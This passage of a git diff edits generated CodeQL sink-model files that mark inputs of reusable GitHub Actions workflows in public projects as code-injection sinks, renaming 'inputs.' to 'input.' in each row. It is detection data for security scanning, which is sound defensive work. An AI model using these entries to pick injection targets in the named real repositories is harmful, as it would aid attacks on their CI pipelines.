d6e334573e4b..8e3b9ccc0f8a 100644 --- a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "inputs.latest", "code-injection", "generated"] - - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "inputs.image_version", "code-injection", "generated"] \ No newline at end of file + - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.latest", "code-injection", "generated"] + - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.image_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml index eeff97a8aeac..f41e2ee12461 100644 --- a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "inputs.version", "code-injection", "generated"] - - ["cryptomator/cryptomator/.github/workflows/av-whitelist.yml", "*", "inputs.url", "code-injection", "generated"] \ No newline at end of file + - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "input.version", "code-injection", "generated"] + - ["cryptomator/cryptomator/.github/workflows/av-whitelist.yml", "*", "input.url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml index 34ffd6788b13..c643a6a9fe06 100644 --- a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "inputs.pr-number", "code-injection", "generated"] - - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "inputs.build-type", "code-injection", "generated"] \ No newline at end of file + - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.pr-number", "code-injection", "generated"] + - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.build-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml index 8ee00d47f799..9aad213b1dfe 100644 --- a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "inputs.name", "code-injection", "generated"] - - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "inputs.tag_name", "code-injection", "generated"] - - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "inputs.all_platforms", "code-injection", "generated"] - - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "inputs.num_shards", "code-injection", "generated"] \ No newline at end of file + - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.name", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.tag_name", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "input.all_platforms", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "input.num_shards", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml index 40b35b5c8732..1906ef45379e 100644 --- a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "inputs.mage-targets", "code-injection", "generated"] - - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "inputs.dev-engine", "code-injection", "generated"] \ No newline at end of file + - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.mage-targets", "code-injection", "generated"] + - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.dev-engine", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml index c02368b5d51f..f5ce50243f7c 100644 --- a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "inputs.deploy_path", "code-injection", "generated"] - - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "inputs.envname", "code-injection", "generated"] \ No newline at end of file + - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.deploy_path", "code-injection", "generated"] + - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.envname", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml index 61b3e84b29e2..58c30f3cd026 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "inputs.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file + - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "input.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml index 72e4a3eec658..d6c0ced50a6a 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "inputs.ddtrace-version", "code-injection", "generated"] - - ["datadog/dd-trace-py/.github/workflows/build-and-publish-image.yml", "*", "inputs.context", "code-injection", "generated"] \ No newline at end of file + - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "input.ddtrace-version", "code-injection", "generated"] + - ["datadog/dd-trace-py/.github/workflows/build-and-publish-image.yml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml index 5e8754427718..fdcb8775dad4 100644 --- a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "inputs.run_id", "code-injection", "generated"] - - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "inputs.source_id", "code-injection", "generated"] \ No newline at end of file + - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.run_id", "code-injection", "generated"] + - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.source_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml index 991743df7d23..66889d2cf428 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml @@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.s3_bucket_name", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.build_script_path", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.nightly_release", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.test_run", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.env_setup_script_path", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.target_branch", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.sha", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.package_test_command", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.version_number", "code-injection", "generated"] \ No newline at end of file + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.build_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.env_setup_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.sha", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.package_test_command", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.version_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml index 780d95fab47f..e5c5cfeabd37 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.nightly_release", "code-injection", "generated"] - - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.test_run", "code-injection", "generated"] - - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.target_branch", "code-injection", "generated"] - - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.version_number", "code-injection", "generated"] \ No newline at end of file + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.version_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml index cf69379583d2..4dc3fc2bc98f 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml @@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.s3_bucket_name", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.build_script_path", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.nightly_release", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.test_run", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.env_setup_script_path", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.target_branch", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.sha", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.package_test_command", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.version_number", "code-injection", "generated"] \ No newline at end of file + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.build_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.env_setup_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.sha", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.package_test_command", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.version_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml index 211fe546e28e..52c4b4c7a24c 100644 --- a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["decidim/decidim/.github/workflows/test_app.yml", "*", "inputs.test_command", "code-injection", "generated"] \ No newline at end of file + - ["decidim/decidim/.github/workflows/test_app.yml", "*", "input.test_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml index d59258ce992a..038f92a53172 100644 --- a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "inputs.release_number", "code-injection", "generated"] \ No newline at end of file + - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "input.release_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml index 43f5349bf3c6..6fab83acf59a 100644 --- a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "inputs.app-version", "code-injection", "generated"] \ No newline at end of file + - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "input.app-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml index d6ef60a96984..238856cc7b9b 100644 --- a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "inputs.test-script", "code-injection", "generated"] - - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "inputs.test-script", "code-injection", "generated"] - - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "inputs.display", "code-injection", "generated"] - - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "inputs.matrix-jobs-count", "code-injection", "generated"] - - ["devexpress/testcafe/.github/workflows/test-client.yml", "*", "inputs.test-script", "code-injection", "generated"] \ No newline at end of file + - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "input.test-script", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "input.test-script", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "input.display", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "input.matrix-jobs-count", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-client.yml", "*", "input.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml index 1d41854bf71f..71b584f54275 100644 --- a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml @@ -3,16 +3,16 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "inputs.artifact-name", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "inputs.append-date-and-hash", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.artifact-name", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.append-date-and-hash", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.common-files", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.xml-dump-type-sizes", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.tests", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.docs", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.extras", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.stonesense", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.platform-files", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.launchdf", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.gcc-ver", "code-injection", "generated"] \ No newline at end of file + - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.artifact-name", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.append-date-and-hash", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.artifact-name", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.append-date-and-hash", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.common-files", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.xml-dump-type-sizes", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.tests", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.docs", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.extras", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.stonesense", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.platform-files", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.launchdf", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.gcc-ver", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml index 9f64a59aead1..1aa154828876 100644 --- a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "inputs.id", "code-injection", "generated"] - - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "inputs.type", "code-injection", "generated"] \ No newline at end of file + - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.id", "code-injection", "generated"] + - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml index 69cb39e5e555..89dd705f5903 100644 --- a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file + - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml index a66e2a2cca53..eb57c708bf53 100644 --- a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml @@ -3,20 +3,20 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.BINARY", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.SUDO", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.TARGET_NAME", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.EXTRA_ARGS", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.BUILT_EARTHLY_PATH", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "inputs.BINARY", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "inputs.SUDO", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.BINARY", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.SUDO", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.EXTRA_ARGS", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.BUILT_EARTHLY_PATH", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.TEST_TARGET", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.BINARY", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.SUDO", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.BINARY_COMPOSE", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.RUN_EARTHLY_TEST_ARGS", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.BUILT_EARTHLY_PATH", "code-injection", "generated"] \ No newline at end of file + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.TARGET_NAME", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.EXTRA_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.BUILT_EARTHLY_PATH", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "input.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "input.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.EXTRA_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.BUILT_EARTHLY_PATH", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.TEST_TARGET", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.BINARY_COMPOSE", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.RUN_EARTHLY_TEST_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.BUILT_EARTHLY_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml index ca3eeca8df70..048a753c553f 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "inputs.profile", "code-injection", "generated"] \ No newline at end of file + - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml index b95ce03ed3a4..739f6a546b2d 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "inputs.profile", "code-injection", "generated"] \ No newline at end of file + - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml index 326d4391ecb5..f6c2769caaf9 100644 --- a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "inputs.solution", "code-injection", "generated"] \ No newline at end of file + - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "input.solution", "code-injection", "generated"] \ No newline at end of file diff --git 